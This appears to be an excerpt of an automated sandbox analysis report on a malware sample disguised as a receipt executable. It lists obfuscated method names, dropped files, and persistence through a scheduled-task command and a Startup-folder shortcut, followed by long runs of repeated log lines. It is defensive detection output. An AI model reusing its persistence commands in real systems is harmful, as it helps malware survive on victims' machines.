            Source: 0.2.Receipt-#202431029B.exe.3718dd8.4.raw.unpack, KF1RPYFCnoxs4StQAi.csHigh entropy of concatenated method names: 'lEYOcid1F', 'TBCY1mS31', 'C5KuGpd5C', 'zOMCYcC2F', 'wpKJSuQhA', 'joP91JcHK', 'kwtoex3ORwEraLdhMO', 'IHnBMVIKhm8SRRLy4B', 'IBSU4esEm9XQgDRGPJ', 'rI4M6t0Yn'
            Source: 0.2.Receipt-#202431029B.exe.3718dd8.4.raw.unpack, MKwas8PYpZOx8H3OeB.csHigh entropy of concatenated method names: 'Q32VxGHS5u', 'PCbVlmPKlU', 'SNFVIoYT0T', 'VT7VKwDxYw', 'QdcVtIO91l', 'R6wVGWUvTD', 'BafVnOSnpO', 'yLxVmuEomy', 'nm4VjsYejS', 'ydTV0UQMhZ'
            Source: 0.2.Receipt-#202431029B.exe.3718dd8.4.raw.unpack, KIep4jGrIXCGAL9Joj.csHigh entropy of concatenated method names: 'fx1imvo5iE', 'KVGi0fI0if', 'BCuMUUwHXR', 'R8SMROI6ku', 'oPeiwr6ijl', 'IVPi8DoMOd', 'zyvioXMrQi', 'OEyix17q1e', 'eXXilYj8UZ', 'KMNiI78P62'
            Source: 0.2.Receipt-#202431029B.exe.3718dd8.4.raw.unpack, yexdJS6ON7njLgLP4l.csHigh entropy of concatenated method names: 'wtSRhKwas8', 'ApZRrOx8H3', 'F2TR58Vc5D', 'YGvRptwggr', 'FcSRe03wYA', 'xorRZ9VyLr', 'hIr8NFaJI7rG5wPwOc', 'KLFDJgZuN1lFH0FC5X', 'tHoRR8CoBK', 'NWgRa43vTb'
            Source: 0.2.Receipt-#202431029B.exe.3718dd8.4.raw.unpack, u9bLHSjivviXKdE2oQ.csHigh entropy of concatenated method names: 'zd8bNVNgF1', 'ohRbAVcwHU', 'fY7b4NO1vj', 'calb7jQ8BJ', 'ftDbWMe2Gf', 'kOvbfkF5Hp', 'gLTbyZINvT', 'A2GbSN6ZaF', 'SWkbsWDG2g', 'f9hbLdvtrs'
            Source: 0.2.Receipt-#202431029B.exe.3718dd8.4.raw.unpack, tBrTLvnq24p7uCKflG.csHigh entropy of concatenated method names: 'iNObeugGtn', 'M4rbiLLUEg', 'nGkbbNILpE', 'D31bk94b4n', 'SAVbEm42S1', 'rnIbqmhDfW', 'Dispose', 'x9fMBj1XaV', 'jZCMVDCwhf', 'jChM39nKpd'
            Source: 0.2.Receipt-#202431029B.exe.3718dd8.4.raw.unpack, aNCEL9J2T8Vc5DjGvt.csHigh entropy of concatenated method names: 'Q0g3YW9WLj', 'AZu3ujt55q', 'n7I3PgJCh7', 'xal3JCHru7', 'peG3ek9crm', 'qIE3ZaE8Yy', 'j5H3ibdKs3', 'Wqd3Mu7L4J', 'Bgl3bPlMRL', 'oAF3dYG6RW'
            Source: 0.2.Receipt-#202431029B.exe.3718dd8.4.raw.unpack, kfPFjHKPrN41PeqK4o.csHigh entropy of concatenated method names: 'bUki52OlHX', 'xqKip0NcDA', 'ToString', 'PuDiBqcpJt', 'g3ciVUrudm', 'DQri3wx9Fy', 'hi4igVvP1E', 'R7niHHiHA0', 'cFaihOigeF', 'MrYirSG4yQ'
            Source: 0.2.Receipt-#202431029B.exe.3718dd8.4.raw.unpack, BEe5fardcVsVhoTVde.csHigh entropy of concatenated method names: 'zokavevnBU', 'SokaBS78nT', 'EhhaVD46A1', 'zjSa3LK9eG', 'Hi6agX9ffP', 'MOjaHtQPa3', 'pGLahyNZPZ', 'OZxarOHyOJ', 'XiTa2NZ6f9', 'KUoa5oBGx6'
            Source: 0.2.Receipt-#202431029B.exe.3718dd8.4.raw.unpack, w7im7ERRxp7kLH42pxP.csHigh entropy of concatenated method names: 'g8fd0AKBfj', 'FA7dzes3wo', 'SOvkUL5HOr', 'KGOkRxOGIy', 'ryGkFZXJ5U', 'wkEka2w6Uq', 'udjk6FaBA8', 'mo4kvZGWhX', 'rAgkBJGpqs', 'vcCkVsRuuJ'
            Source: 0.2.Receipt-#202431029B.exe.3718dd8.4.raw.unpack, OYAXorN9VyLrWvsBRw.csHigh entropy of concatenated method names: 'yD0HvrqXtZ', 'g93HVufBUy', 'G5rHgxBM4Z', 'SwWHhKXwmC', 'iXWHrSKcdP', 'O9NgtWbHJa', 'lf5gGbQK2t', 'Rf7gn0RfxZ', 'P6ygmBi2h1', 'qEhgj7eRZk'
            Source: 0.2.Receipt-#202431029B.exe.3718dd8.4.raw.unpack, WBcJyFoFcy9A0CXYMF.csHigh entropy of concatenated method names: 'ln5cPgLYUc', 'zb3cJiaced', 'N7acNGK00A', 'dEAcANd4It', 'Yhsc7MFO3b', 'fSkcWWcJII', 'K9DcyUZxY7', 'hnVcSuTKul', 'TmfcLSfpqe', 'vBQcw1swEB'
            Source: 0.2.Receipt-#202431029B.exe.3718dd8.4.raw.unpack, JC2QDIRFrOWcdCwqFkG.csHigh entropy of concatenated method names: 'ToString', 'JTLkPSxkEm', 'pBlkJ3IsrF', 'KIjk9Ox4T4', 'gVHkNF130W', 'GwZkAetKjy', 'WGfk4AKv6J', 'Xf5k78VusY', 'iTmmZ5Tzd7PmFFLqBbN', 'EmKa7sH57XJBJJ0fZhd'
            Source: 0.2.Receipt-#202431029B.exe.3718dd8.4.raw.unpack, Oggr1D9mrEqm09cS03.csHigh entropy of concatenated method names: 'hSPgTtCpfU', 'UTEgCxLgpY', 'zPB348QiBA', 'AQ137sVCqF', 'xmD3W60qkS', 'hHf3fkRmRt', 'qZd3y6hZ1x', 'oKZ3SCDokm', 'zia3snO3PS', 'HKU3LMAVmh'
            Source: 0.2.Receipt-#202431029B.exe.3718dd8.4.raw.unpack, MiqhSGVvq03kxUsc87.csHigh entropy of concatenated method names: 'Dispose', 'Hp7RjuCKfl', 'ySxFAkgY23', 'lFX3jABUuf', 'U9YR0my4s5', 'lONRzS2em2', 'ProcessDialogKey', 'aVEFU9bLHS', 'qvvFRiXKdE', 'loQFF3RfP2'
            Source: 0.2.Receipt-#202431029B.exe.3718dd8.4.raw.unpack, BK6KfXxNl4cYo1AxVW.csHigh entropy of concatenated method names: 'QN0eLpDIJv', 'YEGe80E26n', 'yPJexg4gJp', 'qLqel9xOWx', 'hv3eAM37ZP', 'YUoe4cHJiW', 'cKie7hj5Fh', 'oeWeWuserN', 'Ixbef0D2Jk', 'UiNeyfkGVV'
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile created: C:\Users\user\AppData\Roaming\XetHVID.exeJump to dropped file
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile created: C:\Users\user\AppData\Roaming\Notepab.exeJump to dropped file

            Boot Survival

            barindex
            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XetHVID" /XML "C:\Users\user\AppData\Local\Temp\tmp2668.tmp"
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Notepab.lnkJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Notepab.lnkJump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Loading BitLocker PowerShell Module
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
